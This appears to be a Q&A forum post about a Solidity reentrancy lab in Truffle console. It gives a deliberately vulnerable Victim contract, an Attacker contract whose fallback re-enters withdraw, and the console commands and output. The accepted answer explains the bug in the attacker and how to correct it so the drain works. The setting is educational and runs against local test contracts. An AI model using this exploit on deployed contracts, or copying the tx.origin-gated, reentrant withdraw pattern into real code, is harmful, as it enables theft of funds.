# Executing reentrancy on Truffle Console: attacker not stealing 5 ether , why only 2 reentrant calls?

Tags: reentrant-attacks, truffle-console

I am doing the example provided at:
[JustDev](https://medium.com/@JusDev1988/reentrancy-attack-on-a-smart-contract-67%20is:7eae1300f2)
I have parameterized the withdraw method.

Victim SC is:

```
pragma solidity ^0.5.8;
contract Victim{
   address owner;
   constructor() public{
      owner = msg.sender;
   }
   function  withdraw(address payable to, uint amount) public{
      
     // uint transferAmt = 1 ether;
      require(tx.origin == owner); 
      (bool success, ) = to.call.value(amount)("");
      require(success);
   }
   function() payable external {}
}
```

The Attacker SC:

```
pragma solidity ^0.5.8;
import './Victim_tx8.sol';
contract  Attacker{
   uint amount = 1 ether;
   address payable owner;
   Victim  public v;
   uint public  count;
   event LogFallback(uint c, uint balance);
   
 
   constructor (address payable victim) public {
      owner = msg.sender;
      count =0;
      v=Victim(victim);
   }
  

   function attack(address payable to, uint a) public {
      v.withdraw(to, a);
   }

   function () external payable{
      count++;
      emit LogFallback(count, address(this).balance);
      if(count < 5 ) {
         v.withdraw(owner,amount);
      }
    }
}
```

I think it is not executing the reentrant call 5 times (why?). I used the Truffle console and executed the following commands:

```
       V = await Victim.deployed()
       A = await Attacker.deployed()
       acc2 = accounts[2]
       web3.eth.sendTransaction({to:V.address, from:acc2, value: web3.utils.toWei('15')})//executes the transaction
       Vbal = await web3.eth.getBalance(V.address)
       web3.utils.fromWei(Vbal, "ether")
       15
       await A.attack(A.address, web3.utils.toWei('1',"ether"),{from:accounts[0]})//executes the transaction
       Vbal = await web3.eth.getBalance(V.address)
       web3.utils.fromWei(Vbal, "ether")
       '13'
       Abal = await web3.eth.getBalance(A.address)
       undefined
       web3.utils.fromWei(Abal, "ether")
       '1'
```

Initial balance of Victim is 0, and incremented to 15. During reentrancy Withdraw(..) is transferring Ether, but Victim final balance is '13', and attacker balance is only '1',why?. Somebody please guide me why there are not 5 rounds of reentrant calls?

Answer (score 2, accepted):

Just replace `v.withdraw(owner,amount);` by `v.withdraw(address(this),amount);` in the fallback function of the `Attacker` smart contract.

In fact `owner` here refers to the account used to deploy `Attacker`. So currently the `withdraw` function is only called twice to :

- transfer the amount `a` (1 ether) to the `to` address (`Attacker` address), `a` and `to` being the parameters of the `attack` function.
- transfer 1 ether (`amount` state variable) to the `owner` EOA.

By replacing `owner` by `address(this)` in the fallback you will get the correct behavior and the `Attacker` smart contract will receive `4 ether + a`.